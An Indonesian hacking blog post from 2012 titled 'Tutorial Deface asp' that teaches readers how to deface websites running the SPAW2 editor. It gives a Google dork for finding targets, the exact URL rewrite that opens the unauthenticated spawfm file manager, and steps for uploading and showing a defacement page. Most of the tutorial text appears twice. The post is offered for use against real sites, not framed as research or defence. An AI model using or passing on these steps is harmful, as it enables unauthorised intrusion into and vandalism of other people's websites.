google dork : inurl:"spaw2/uploads/files/"
setelah mencari kesana kemari misalnya kita udah dpt target..
example :
Code:
http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf
gimana lagi nih? okeh..
ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf
menjadi
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi
http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hmm gimana buat upload file deface kita??
begini
lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"
seperti gambar :
![[Image: 216711_115497381863480_100002096566712_1...9466_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t6e52f1Gs9CvferJ0JtVFkRl7hKLa24CbqsRfh57Ou4EwDsWFvaorlkbL2ej8BUIKBRtBWovLOKkilzVywTbBZY_w1c2WiZlVo2XD7eSE6A98T8JaixH1xQSrUA3dBm9faBQQ_OtJL2jprsxFrmXn4mYW3Eyuhns_adWfUcqBvJ25xzx2V_Y0Nbac=s0-d)
kemudian upload
![[Image: 207321_115498021863416_100002096566712_1...6993_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sSdbQbQhtVGjlmYuR9-vU5bKN1Mnq5rEPCUIf8YD9ZeBUPfyKGrDRJ9ckCOjMdwwF8iG8XoxMuI51Ha2vIk6jnQl2___atNQW3Zhys-bq2A-z8_tSTzVm-joP0yBF9SAxmyz3NVlYGIREZdTKy7VZBOhHdOWz1ZNwH8qY80wMa-G9_HHFWfG3H5ZqK=s0-d)
setelah selesai klik browse lalu upload file deface kalian..
seperti gambar :
![[Image: 216507_115497471863471_100002096566712_1...7884_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sq7TENaPRzd3bVqNabSAUvtQwPCaxS9T63iIk9dcQJ5FMrJMu14--Hd3rLn7I7mfaRQYzbJbsj70vITx-3fKD1Z-5oVNX9wGBK2l23QkfOvQf_vf2akcoyAc9Ic8wSkU9gmnKTshm2E-s7ngcoXL3lTHtESfvhLgBwSIG4IhYDUvBqR7sCrTUVUVmE=s0-d)
kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,
lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]
![[Image: 217017_115499915196560_100002096566712_1...4444_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tFtgPwx2vug2qoV_1QNIuDGIKWpeg0S9fp_UdIyy71ZQ4ObeUzIp5GLw9dSO0rVBdM7sSF_iG7vG78zaVbcl5faraREXW1kSm8beIXV8YFnzqRLDiDGJ99XP5oDRzwVml0gV4kk-mCrG6AU4mlqtHR0YhETUkjBezWmesiR1C4Al-FXwgyzFYsKmlT=s0-d)
dan berikut hasil dari kerjaan diatas td :)
![[Image: 217060_115499768529908_100002096566712_1...3884_a.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tMhO8E_JRO9xGvyuyIBIlXJZkZH9RvHKjRMEqJ1x-Y7Ahr_UBp9KNh3iDd6tLlOrgxStoYoDT3suHd_Y9-XN61d8mQVX3gZZ2x2a3U15Ie_dJp4zPhGR5b3gXQUqm1q17HcFFWzogJyiIrS-oAYpUYCDQmUzUE9rttd2A1aJYn0oSu7T0tZbi_qFG7=s0-d)
semoga sukses
setelah mencari kesana kemari misalnya kita udah dpt target..
example :
Code:
http://www.corporation22.com/cms/spaw2/uploads/files/Solar_modules/HS-122st.pdf
gimana lagi nih? okeh..
ganti spaw2/uploads/files/Solar_modules/HS-122st.pdf
menjadi
spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2⟨=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
sehingga menjadi
http://www.corporation22.com/cms/spaw2/dialogs/dialog.php?module=spawfm&dialog=spawfm&theme=spaw2%E2%8C%A9=es&charset=&scid=cf73b58bb51c52235494da752d98cac9&type=files
hmm gimana buat upload file deface kita??
begini
lihat pilihan folder di atas, pada link target yang telah di exploit Spaw td, kemudian ubah "images" menjadi "files"
seperti gambar :
kemudian upload
setelah selesai klik browse lalu upload file deface kalian..
seperti gambar :
kalo udah di upload gimana lagi supaya muncul hasil deface kita??
begini,
lihat dulu nama file yg kalian upload td apa.. setelah ketemu lihat disamping kanan kemudian klik [download files]
dan berikut hasil dari kerjaan diatas td :)
semoga sukses
Anda baru saja membaca artikel yang berkategori Hacking
dengan judul Tutorial Deface asp. Anda bisa bookmark halaman ini dengan URL https://catatan-lutfi.blogspot.com/2012/07/tutorial-deface-asp.html. Terima kasih!
Ditulis oleh:
Lutfi rahman - Selasa, 17 Juli 2012
Belum ada komentar untuk "Tutorial Deface asp"
Posting Komentar